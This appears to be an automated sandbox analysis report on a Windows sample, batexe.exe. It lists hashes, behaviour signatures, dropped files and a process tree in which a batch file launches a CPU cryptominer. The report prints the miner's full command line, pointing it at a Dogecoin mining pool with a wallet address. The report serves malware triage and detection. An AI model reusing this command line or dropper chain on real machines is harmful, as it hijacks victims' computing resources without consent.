73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
13/02/2024, 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1888	b2e.exe
1948	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1948	cpuminer-sse2.exe
1948	cpuminer-sse2.exe
1948	cpuminer-sse2.exe
1948	cpuminer-sse2.exe
1948	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5052-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5052 wrote to memory of 1888	5052	batexe.exe	85
PID 5052 wrote to memory of 1888	5052	batexe.exe	85
PID 5052 wrote to memory of 1888	5052	batexe.exe	85
PID 1888 wrote to memory of 2508	1888	b2e.exe	87
PID 1888 wrote to memory of 2508	1888	b2e.exe	87
PID 1888 wrote to memory of 2508	1888	b2e.exe	87
PID 2508 wrote to memory of 1948	2508	cmd.exe	89
PID 2508 wrote to memory of 1948	2508	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5052
- C:\Users\Admin\AppData\Local\Temp\72AF.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\72AF.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\72AF.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\756E.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2508
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\72AF.tmp\b2e.exe

Filesize
1.4MB

MD5
620a384ac183b13ab0fcf4a77a1794b5

SHA1
6f21ed0e7013a7479ff46e1f07599004298a5940

SHA256
36437f31ef7d501717f7048090d797e9e50af46ca9c7cd4b43f9c67937a912ba

SHA512
3775b4cec83570e1c1097ccf2f1c152d2c3de51343daaa7f5ce86f23c0a0f87faa5a2e33df2219088771cd688f5083eaee8a5a80b4df83b486415b34216637ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\72AF.tmp\b2e.exe

Filesize
1.0MB

MD5
b2ce88316b5c70ec6e678e35fc1bb1aa

SHA1
2527b21ad4a68498002ca1bc1558236209c72839

SHA256
148f1980d0c0f41c4e8147ee918608608022026f07aacf9af8bd2967bd0904e8

SHA512
af4a8b89e65efa1e15dd63bb8c543f4885b710fa79585f7e96b69b456162c0380a68ee68ab5cb133029f41b40d0a7881474631d7ada13afa1166ac7cebf2cbe0

Download Submit
C:\Users\Admin\AppData\Local\Temp\72AF.tmp\b2e.exe

Filesize
732KB

MD5
a8c05e43e168d873285747d1f49787ae

SHA1
2a252508357c6970ab80997939e01b505f11c34e

SHA256
43413082e3ffa3c1760e36daa6254c3ee93e97ba06db2ded79867aef67d8c364

SHA512
34d206e5c5bc9d7164051c3215ea34caa33573b96061571ce10eb9588185778e39168aeda6f9699027cce5634d98a5b6e5d821b01fca71baadf377e1cf806b3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\756E.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
0450158068c480cec7d6eb32c70a1174

SHA1
4ffd27a8ae5f40ba13251428851e2cbd7e7c53de

SHA256
6aba2134fb82d31255521492a0b029e7e804534a8fe665b5e7ab9843e9e64bab

SHA512
a835ad6bfff3bdef3f7981d06a357aa6fc3e666561dfdceb9dbd7e6a559ae6df7a0697738360efaca5d8c81d2a7cf6433589714cd9bf29f8d8f7e8230fb8d59f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
793KB

MD5
c92f06887ac141f1a4abe4bcab6ab14f

SHA1
650be83c075f14f05485a16df5d8d15949c51946

SHA256
adabcb96c3a52a2528ee7ec94b59d7801ab915fcc139ad7396efb0e7f641ace3

SHA512
80ddc4f8c43f0d0ac0518dc2e0b055af6bd12a4ed665fafb1b828dac358fe91b018fb357c89839cdb43cad8491dcfaa5b0553db4a2acbf44d8deeae9814e1729

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
981KB

MD5
75f6974349d9a5860cf754aaef3f9b6e

SHA1
4292d49f580cb10e59f7098ede919daaf6857d97

SHA256
65550f2e470cfb2624e0b26624ec71643db48c907238660100243f6013eaba77

SHA512
42721b684589661909d8455fc8e52a1cf799fd9fb00fcc8a11c7b4b4aeb9d6f4d573ab59a0406ff4f5206ab4892b2a3f90fb744db91a5a3319896b87598adb0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.0MB

MD5
3eef982c0ba1a8f564e92554873d6215

SHA1
5a1ff47b0d4a710f32205e194a56333b7ddf84f2

SHA256
f91284e099dcad6d05f0d74745e634b61567d19aa4a34824b4de05892cd112fc

SHA512
ed7f2b58fc73563009afea77d546081c6fb42392386f63afd44e16193e3c19fda97eeceea34e96308d5c510ea9f32d5d53d2ab7715f8df4e42da2b3ad05513f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
22e4de29b233b1a6321bcaa7ec3aa383

SHA1
4da8021885b8ad98a4add2dd79ed3074dd1a4e8b

SHA256
696af75f6deee1e37f7e2403885f21c6a67e3e377dddc6a9c1a2ca736d214918

SHA512
a45afee16c4eb0e4154801a207f5fe6070cb8dcc22835fc9edac1ede16b7f3cf66f5438c05edbda08e80cc6341c7725397b6c812af9a73dd12e8724659315191

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
90KB

MD5
3cfc1ad8c53c6c9775c906cfce991fb2

SHA1
7323669f08a7905b20d86440ee9331c2c15c5f66

SHA256
31cf20eec735f56bd11b99fb987f77155aec774f41c398aae03b985432dca84c

SHA512
8424b5f2fa2f0bc5143a21b634304328fa358367acfa9bd10a0fe6e97e05f2865a39743ebd61d9c82ed4a55a0394b352382b3350828b9ea0f4bd17de080cafa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
128KB

MD5
9746d1ac79c8b499d8b2224394581fa7

SHA1
36b1985eabfd8131ad9f2b7f69c903a3fce67629

SHA256
77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

SHA512
61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
220KB

MD5
823f19b3f5f1faf19b00f6ae2f0b64ca

SHA1
90198a7302af732c4cc9fca9cacdcfdec431a646

SHA256
a4d4c50d8a4147e04e4bc418473b620a0a6b613d7b644c829a572012ebc22804

SHA512
f8911512b35aae8e4dc0e14f80f007c142f9a696a6067041fdf6b450e7e925e6f3c345f780bd3c20410a3d6d2c06cc3314bd3535b1a3d14ae6f523ca49200493

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
92KB

MD5
cd89e90e6ace3d5fb268fe1f45396147

SHA1
96517bdb91c984e50353bfbacf2f875d61f7ba61

SHA256
2c69f5e4d2198a18785149c29781b9d49d1bc02563b5f9b2d183c4b312e73d77

SHA512
47af42f14d06f54cd5b404f0860f9bfb0b09c0346402763bf88ee32b47d9ceb21eaf57e5d86a0c2a7c056dc8656d188d725cfcd5afecc215ecc3f9257c138116

Download Submit
memory/1888-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1888-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1948-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1948-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1948-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/1948-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-46-0x0000000065110000-0x00000000651A8000-memory.dmp

Filesize
608KB

Download
memory/1948-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1948-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5052-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download